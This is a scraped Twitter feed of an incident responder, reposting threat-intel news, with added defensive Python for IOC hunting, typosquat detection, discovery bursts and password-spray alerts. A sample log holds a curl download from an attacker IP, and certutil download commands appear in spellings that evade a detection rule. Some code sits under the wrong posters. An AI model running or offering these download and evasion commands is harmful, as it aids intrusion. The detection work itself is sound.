Tornado (@0xtornado): Twitter profile
Tornado

@0xtornado

Incident Responder & @TheDFIRReport Member • Hunting and dissecting smart creatures called malware, doing forensics between whiles…

ID: 770006745976627201

Joined: 28-08-2016 21:14:49

1.1K Tweets

2.2K Followers

543 Following

blueteam0ps (@blueteam0ps_):

Excited to announce the 🚀 launch of the 🔥 LOLESXi project. It provides valuable insights into adversarial techniques targeting VMware ESXi. lolesxi-project.github.io/LOLESXi/ #threatresearch #lolesxi #dfir

Tornado (@0xtornado):

Our latest report is live! The team put in incredible efforts breaking down the TTPs. Give it a read and prepare your hunts! Hope you find it valuable 😉 #DFIR #BlackCatRansomware

Ivan Kwiatkowski (@justicerage):

If you're using Zimbra, mass-exploitation of CVE-2024-45519 has begun. Patch yesterday. Malicious emails are coming from 79.124.49[.]86 and attempting to curl a file from that IP.

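As an added triage script (not part of Ivan Kwiatkowski's post and not Zimbra tooling), the Python below refangs the indicator from the post and hunts for it in mail and process logs. The log lines are constructed samples in a Postfix-like format plus one audit-style process record; nothing here is a captured Zimbra log. Because the post says the emails go on to curl a file from that IP, lines that show the indicator together with curl or wget are reported under a separate reason from plain SMTP traffic.

```python
import re

# Indicator quoted in the post above, kept defanged so it is not clickable.
DEFANGED_SOURCE_IP = "79.124.49[.]86"


def refang(ioc: str) -> str:
    """Reverse common defanging ('[.]', 'hxxp') so the indicator matches raw log text."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


def ip_pattern(ip: str) -> re.Pattern:
    """Match the IP only as a whole token: 79.124.49.86 must not hit 179.124.49.86 or 79.124.49.860."""
    return re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])")


# Constructed sample lines (not captured Zimbra logs): Postfix-style MTA entries plus one
# audit-style process record standing in for whatever process telemetry the host has.
SAMPLE_LOG = """\
Oct  2 09:14:03 mta postfix/smtpd[2211]: connect from unknown[79.124.49.86]
Oct  2 09:14:04 mta postfix/smtpd[2211]: 4A1B2C: client=unknown[79.124.49.86]
Oct  2 09:14:05 mta postfix/smtpd[2211]: 4A1B2C: from=<sender@example.net>, size=1203, nrcpt=1
Oct  2 09:14:09 mta audit: uid=zimbra exe=/usr/bin/curl cmdline="curl -o /tmp/x http://79.124.49.86/x"
Oct  2 09:15:11 mta postfix/smtpd[2212]: connect from mail.partner.example[203.0.113.7]
Oct  2 09:15:12 mta postfix/smtpd[2212]: 5D3E4F: to=<alice@victim.example>, status=sent
Oct  2 09:16:00 mta postfix/smtpd[2213]: connect from unknown[179.124.49.86]
"""


def hunt(log_text: str, defanged_ip: str) -> list:
    """One hit per line that references the indicator.

    reason is 'download-from-ioc' when the line also shows curl/wget (the follow-on
    behaviour the post describes), else 'traffic-from-ioc'.
    """
    pat = ip_pattern(refang(defanged_ip))
    fetch = re.compile(r"\b(curl|wget)\b", re.I)
    hits = []
    for line in log_text.splitlines():
        if pat.search(line):
            reason = "download-from-ioc" if fetch.search(line) else "traffic-from-ioc"
            hits.append({"reason": reason, "line": line})
    return hits


def summarize(hits) -> dict:
    """Count hits by reason, so a zero under 'download-from-ioc' still tells you the IP was seen."""
    counts = {"traffic-from-ioc": 0, "download-from-ioc": 0}
    for h in hits:
        counts[h["reason"]] += 1
    return counts


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG, DEFANGED_SOURCE_IP)
    for h in found:
        print(f"{h['reason']:18} {h['line']}")
    print(summarize(found))
```

Swap SAMPLE_LOG for real mail and process log contents to run it in anger. A single source IP ages out quickly, so this is a triage check layered on top of patching, not a substitute for it; the token-boundary match matters because a bare substring search would also light up on 179.124.49.86.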

Csaba Fitzl (@theevilbit):

🍎🗒️ New macOS persistence is out! ➡ The launchd embedded plist. Thanks @byaaaaahhh for the idea. theevilbit.github.io/beyond/beyond_…

Unit 42 (@unit42_intel):

2024-10-09 (Wednesday): We continue to see #malware pushing #LummaStealer from fake (#typosquatted) websites impersonating legitimate software vendors. More information at: bit.ly/4h34dP2

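Typosquatted vendor domains are the delivery mechanism named in the Unit 42 post above. As an added example (not Unit 42 code, and the post names no vendors), the Python below scores observed domains against a constructed vendor allow-list: it folds common look-alike substitutions, measures Levenshtein distance on the registrable label, and additionally flags domains that embed a whole vendor name with a lure word attached, which pure edit distance misses. The vendor list, homoglyph table and observed domains are all constructed for illustration.

```python
# Constructed vendor allow-list and observed domains; the post names no specific vendors.
VENDOR_DOMAINS = ["notepad-plus-plus.org", "7-zip.org", "videolan.org", "putty.org"]
SAMPLE_OBSERVED = [
    "notepad-plus-plus.org",   # exact vendor domain, ignored
    "notepad-p1us-plus.org",   # digit 1 for letter l
    "7-zlp.org",               # one-letter substitution
    "videolan-download.com",   # brand plus a lure word
    "example.com",             # unrelated
    "puttty.org",              # doubled letter
]

# Look-alike substitutions folded before measuring edit distance (assumed set, extend as needed).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})


def fold(label: str) -> str:
    """Lower-case and collapse look-alikes so 'p1us' and 'rn' compare as 'plus' and 'm'."""
    return label.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def registrable(domain: str) -> str:
    """Strip the last label (TLD). Crude stand-in for a public-suffix lookup; enough here."""
    domain = domain.lower().rstrip(".")
    return domain.rsplit(".", 1)[0] if "." in domain else domain


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance with a two-row table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(observed, vendors=VENDOR_DOMAINS, max_distance=2):
    """Return observed domains that look like a vendor domain but are not one.

    A domain is flagged when its folded registrable label is within max_distance edits of a
    vendor label, or when it contains a vendor label of at least five characters outright
    (brand + lure word). Exact vendor domains are skipped.
    """
    exact = {v.lower() for v in vendors}
    out = []
    for dom in observed:
        if dom.lower() in exact:
            continue
        base = fold(registrable(dom))
        for v in vendors:
            vb = fold(registrable(v))
            d = levenshtein(base, vb)
            if d <= max_distance or (len(vb) >= 5 and vb in base):
                out.append({"domain": dom, "impersonates": v, "distance": d})
                break
    return out


if __name__ == "__main__":
    for c in typosquat_candidates(SAMPLE_OBSERVED):
        print(f"{c['domain']:28} looks like {c['impersonates']:24} (distance {c['distance']})")
```

Feed it newly registered domains or proxy-log hostnames rather than the constructed list. Distance 0 after folding is the strongest signal, since the only difference is a homoglyph; the containment branch is noisier and is the one to tune with a longer minimum length or a denylist of lure words.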

Mandiant (part of Google Cloud) (@mandiant):

🚨 Breaking: A zero-day vulnerability (CVE-2024-47575) has been observed impacting Fortinet FortiManager devices, posing serious risks. Learn how the exploit works, and how to defend against the threat. Read more -> bit.ly/4hbqmuR #ThreatIntelligence


Renzon (@r3nzsec):

I recently co-authored a Unit 42 blog about a unique IR case in which a threat actor’s custom EDR bypass (using #BYOVD) exposed their toolkit, methods, and even identity. Check out how we unmasked them through an opsec slip-up! #dfir unit42.paloaltonetworks.com/edr-bypass-ext…

Deedy (@deedydas):

The most bizarre coding interview I've ever done was at Facebook when as usual I asked a candidate to write in any language of their choice.. And they nonchalantly said "I'll write it in SQL", to which I almost let loose a chuckle until...


Renzon (@r3nzsec):

Unit 42 just dropped an awesome blog about LDAP detection used by different adversaries. Pretty awesome to see a shoutout to our Dagon Locker report from The DFIR Report, which we published a few months back. #dfir unit42.paloaltonetworks.com/lightweight-di…


Renzon (@r3nzsec):

This is my first blog for this year, and excited to kick off 2025 with the release of our first The DFIR Report 's post regarding "Cobalt Strike and a Pair of Socks Lead to LockBit Ransomware." Look at how Lockbit leverages GhostSOCKS and SystemBC as part of its persistence,


The DFIR Report (@thedfirreport):

PYSA/Mespinoza Ransomware

➡️TTR 7.5 hours
➡️Koadic and Empire for C2
➡️7+ Credential Access techniques
➡️ADRecon, APS, quser, arp, and nltest for Discovery
➡️RDP and PsExec for Lateral Movement
➡️Files exfiltrated
➡️PYSA ransomware for Impact

Report link ⬇️

Wietze (@wietze):
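The Discovery line in the summary above (ADRecon, quser, arp, nltest) is the kind of tool cluster a hunt can key on: any one of those commands is routine, but several distinct ones from the same host and user inside a few minutes is not. As an added example (not The DFIR Report's own detection or a Sigma rule from the report), the Python below runs a sliding-window check over constructed process-creation events. The event tuples, host names and user names are constructed; ADRecon is matched on the command line because it is a PowerShell script rather than an image name.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Optional

# Discovery tooling named in the post, keyed by image name as it appears in a
# process-creation event. ADRecon is a PowerShell script, so it is matched on the command line.
DISCOVERY_IMAGES = {"quser.exe", "arp.exe", "nltest.exe", "net.exe", "whoami.exe"}
DISCOVERY_SCRIPTS = {"adrecon.ps1"}


def discovery_tool(image: str, cmdline: str) -> Optional[str]:
    """Return the discovery tool a process event represents, or None if it is not one."""
    name = image.rsplit("\\", 1)[-1].lower()
    if name in DISCOVERY_IMAGES:
        return name
    low = cmdline.lower()
    for script in DISCOVERY_SCRIPTS:
        if script in low:
            return script
    return None


# Constructed sample process-creation events (timestamp, host, user, image, command line).
# Not taken from the report.
EVENTS = [
    ("2021-03-01 10:00:05", "WS01", "CORP\\jdoe", "C:\\Windows\\System32\\quser.exe", "quser"),
    ("2021-03-01 10:00:40", "WS01", "CORP\\jdoe", "C:\\Windows\\System32\\ARP.EXE", "arp -a"),
    ("2021-03-01 10:02:10", "WS01", "CORP\\jdoe", "C:\\Windows\\System32\\nltest.exe", "nltest /dclist:corp"),
    ("2021-03-01 10:03:30", "WS01", "CORP\\jdoe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -ep bypass -f C:\\Users\\Public\\ADRecon.ps1"),
    ("2021-03-01 11:30:00", "WS02", "CORP\\helpdesk", "C:\\Windows\\System32\\quser.exe", "quser"),
    ("2021-03-01 15:45:00", "WS02", "CORP\\helpdesk", "C:\\Windows\\System32\\nltest.exe", "nltest /dsgetdc:corp"),
    ("2021-03-01 16:00:00", "SRV01", "CORP\\svc_backup", "C:\\Windows\\System32\\notepad.exe", "notepad"),
]


def discovery_bursts(events, window=timedelta(minutes=10), min_distinct=3):
    """Flag (host, user) pairs that ran >= min_distinct different discovery tools within `window`.

    Slides a window over each principal's discovery events in time order and emits one alert
    per principal for the earliest qualifying window, so the analyst gets a starting timestamp.
    Counting distinct tools rather than raw events keeps a helpdesk user running quser twice
    from firing.
    """
    per_principal = defaultdict(list)
    for ts, host, user, image, cmdline in events:
        tool = discovery_tool(image, cmdline)
        if tool:
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            per_principal[(host, user)].append((when, tool))

    alerts = []
    for (host, user), seq in per_principal.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):
            tools = {t for when, t in seq[i:] if when - start <= window}
            if len(tools) >= min_distinct:
                alerts.append({"host": host, "user": user, "start": start, "tools": sorted(tools)})
                break
    return alerts


if __name__ == "__main__":
    for a in discovery_bursts(EVENTS):
        print(f"{a['host']} {a['user']} from {a['start']:%H:%M:%S}: {', '.join(a['tools'])}")
```

The window and threshold are the knobs to tune: the TTR of 7.5 hours in the summary means the whole intrusion was short, so ten minutes and three distinct tools is a reasonable starting point, and widening either catches slower hands-on-keyboard discovery at the cost of more helpdesk noise.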

By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections. My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees. Here’s what I found and why it matters 👉 wietze.github.io/blog/bypassing…


randy@infosec.exchange (@rpargman):
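As an added illustration of the bypass class Wietze describes (this is not his code or his test harness), the Python below takes one naive command-line rule and shows it missing two trivially altered variants of the same certutil download command, then shows the same rule catching all of them once the command line is canonicalised first. The variants and the normaliser are constructed for this example; the behaviours they rely on are that certutil accepts '/' as well as '-' as the switch character and that Windows argument parsing (CommandLineToArgvW rules) strips embedded double quotes before the program sees its arguments.

```python
import re

# A naive rule of the kind the post shows being bypassed: it matches the literal switch
# spelling of a well-known certutil download command line.
NAIVE_RULE = re.compile(r"certutil(\.exe)?\b.*\s-urlcache\b.*\s-f\b", re.I)

# Constructed command lines. Each reaches certutil with the same meaning, because
# (a) certutil accepts '/' as well as '-' for switches and (b) Windows argv parsing
# (CommandLineToArgvW rules) strips embedded double quotes before the program sees them.
# Only the first and last match NAIVE_RULE as written.
VARIANTS = [
    'certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe',        # canonical
    'certutil.exe /urlcache /split /f http://example.invalid/a.exe a.exe',        # option-char substitution
    'certutil.exe -"urlcache" -split -"f" http://example.invalid/a.exe a.exe',    # quote insertion
    'CERTUTIL -UrlCache -Split -F http://example.invalid/a.exe a.exe',            # case change, no extension
]


def normalize(cmdline: str) -> str:
    """Canonicalise a command line before matching:
    drop double quotes, rewrite '/' switches as '-', fold case, collapse whitespace."""
    s = cmdline.replace('"', "")
    s = re.sub(r"(^|\s)/", r"\1-", s)          # '/urlcache' -> '-urlcache'; leaves 'http://' alone
    s = re.sub(r"\s+", " ", s).strip().lower()
    return s


def matches(rule: re.Pattern, cmdline: str, normalizer=None) -> bool:
    """Apply a rule to the raw command line, or to its normalised form when a normaliser is given."""
    text = normalizer(cmdline) if normalizer else cmdline
    return rule.search(text) is not None


def evaluate(variants=VARIANTS) -> dict:
    """Count how many variants the same rule catches raw versus after normalisation."""
    return {
        "naive": sum(matches(NAIVE_RULE, v) for v in variants),
        "normalized": sum(matches(NAIVE_RULE, v, normalize) for v in variants),
    }


if __name__ == "__main__":
    for v in VARIANTS:
        raw = matches(NAIVE_RULE, v)
        canon = matches(NAIVE_RULE, v, normalize)
        print(f"raw={raw!s:5} normalized={canon!s:5} {v}")
    print(evaluate())
```

The rule is identical in both runs; only the input changes. The catch is that the normaliser has to mirror what the target binary actually accepts: certutil tolerates both switch characters, but not every executable does, and some accept shorthands or extra characters this normaliser does not fold. That per-executable behaviour is what the research catalogues, and it is why a single generic normaliser cannot be assumed to close the gap for all ~70 binaries.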

thedfirreport.com/2025/05/19/ano… It was a lot of fun working on this report with bsky.app/profile/did:pl… and x.com/0xtornado Tornado - we came up with a new Sigma detection for Impacket tools that I hope you will find useful for #threathunting

The DFIR Report (@thedfirreport):

🌟New report out today!🌟

Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware

Analysis and reporting completed by @pcsc0ut.bsky.social, @irishdeath.bsky.social & Tornado

🔊Audio: Available on Spotify, Apple, YouTube and more!

thedfirreport.com/2025/05/19/ano…

The DFIR Report (@thedfirreport):

🌟New report out today!🌟

Hide Your RDP: Password Spray Leads to RansomHub Deployment

Analysis and reporting completed by [email protected]Aleks and UC2

🔊Audio: Available on Spotify, Apple, YouTube and more!

thedfirreport.com/2025/06/30/hid…
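The initial access in the report announced above is a password spray against exposed RDP. As an added example (not The DFIR Report's detection logic), the Python below runs the check that separates a spray from ordinary failed logons over constructed Windows 4625-style events: one source IP failing against many distinct accounts inside a short window. The events, IPs and account names are constructed; the logon-type handling assumes that failed RDP authentication lands in 4625 as type 10 (RemoteInteractive) or, when NLA fronts the session, as type 3 (Network).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Logon types that failed RDP authentication shows up under in 4625 events:
# 10 = RemoteInteractive; 3 = Network, which is how NLA-fronted RDP failures are recorded.
RDP_LOGON_TYPES = {10, 3}


def constructed_failed_logons():
    """Constructed 4625-style events: (time, source IP, target user, logon type). Not real data.

    198.51.100.23 sprays twelve different accounts once each; 203.0.113.9 hammers one
    account (brute force, not a spray); 10.0.0.5 is a user mistyping their own password.
    """
    base = datetime(2025, 6, 1, 2, 15, 0)
    events = []
    sprayed = ["administrator", "jsmith", "mlee", "backup", "scanner", "helpdesk",
               "svc_sql", "rdpuser", "test", "guest", "operator", "finance"]
    for i, user in enumerate(sprayed):
        events.append((base + timedelta(seconds=20 * i), "198.51.100.23", user, 10))
    for i in range(8):
        events.append((base + timedelta(seconds=5 * i), "203.0.113.9", "bob", 10))
    events.append((base + timedelta(minutes=30), "10.0.0.5", "alice", 10))
    events.append((base + timedelta(minutes=31), "10.0.0.5", "Alice", 10))
    return events


def password_spray(events, window=timedelta(minutes=15), min_users=8, logon_types=RDP_LOGON_TYPES):
    """Alert once per source IP that failed logons against >= min_users distinct accounts within `window`.

    Distinct target accounts, not raw attempt count, is the discriminator: a spray keeps
    per-account attempts low to stay under lockout thresholds, so brute-force logic
    (many failures on one account) misses it. User names are case-folded so 'alice'
    and 'Alice' count once.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, ltype in events:
        if ltype in logon_types:
            by_ip[ip].append((ts, user.lower()))

    alerts = []
    for ip, seq in sorted(by_ip.items()):
        seq.sort()
        for i, (start, _) in enumerate(seq):
            in_window = [u for ts, u in seq[i:] if ts - start <= window]
            users = set(in_window)
            if len(users) >= min_users:
                alerts.append({"source_ip": ip, "start": start,
                               "distinct_users": len(users), "attempts": len(in_window)})
                break
    return alerts


if __name__ == "__main__":
    for a in password_spray(constructed_failed_logons()):
        print(f"{a['source_ip']} sprayed {a['distinct_users']} accounts "
              f"({a['attempts']} attempts) from {a['start']:%Y-%m-%d %H:%M:%S}")
```

The brute-force source in the sample makes eight attempts, the same number as the threshold, and is correctly not flagged because all eight hit one account. Against real 4625 data the remaining work is on the input side: pull the source address from the event's IpAddress field (it is "-" for some local failures) and keep the window short enough that a slow spray still clusters, which is also the case for moving RDP behind a VPN or gateway so there is nothing on the internet to spray in the first place.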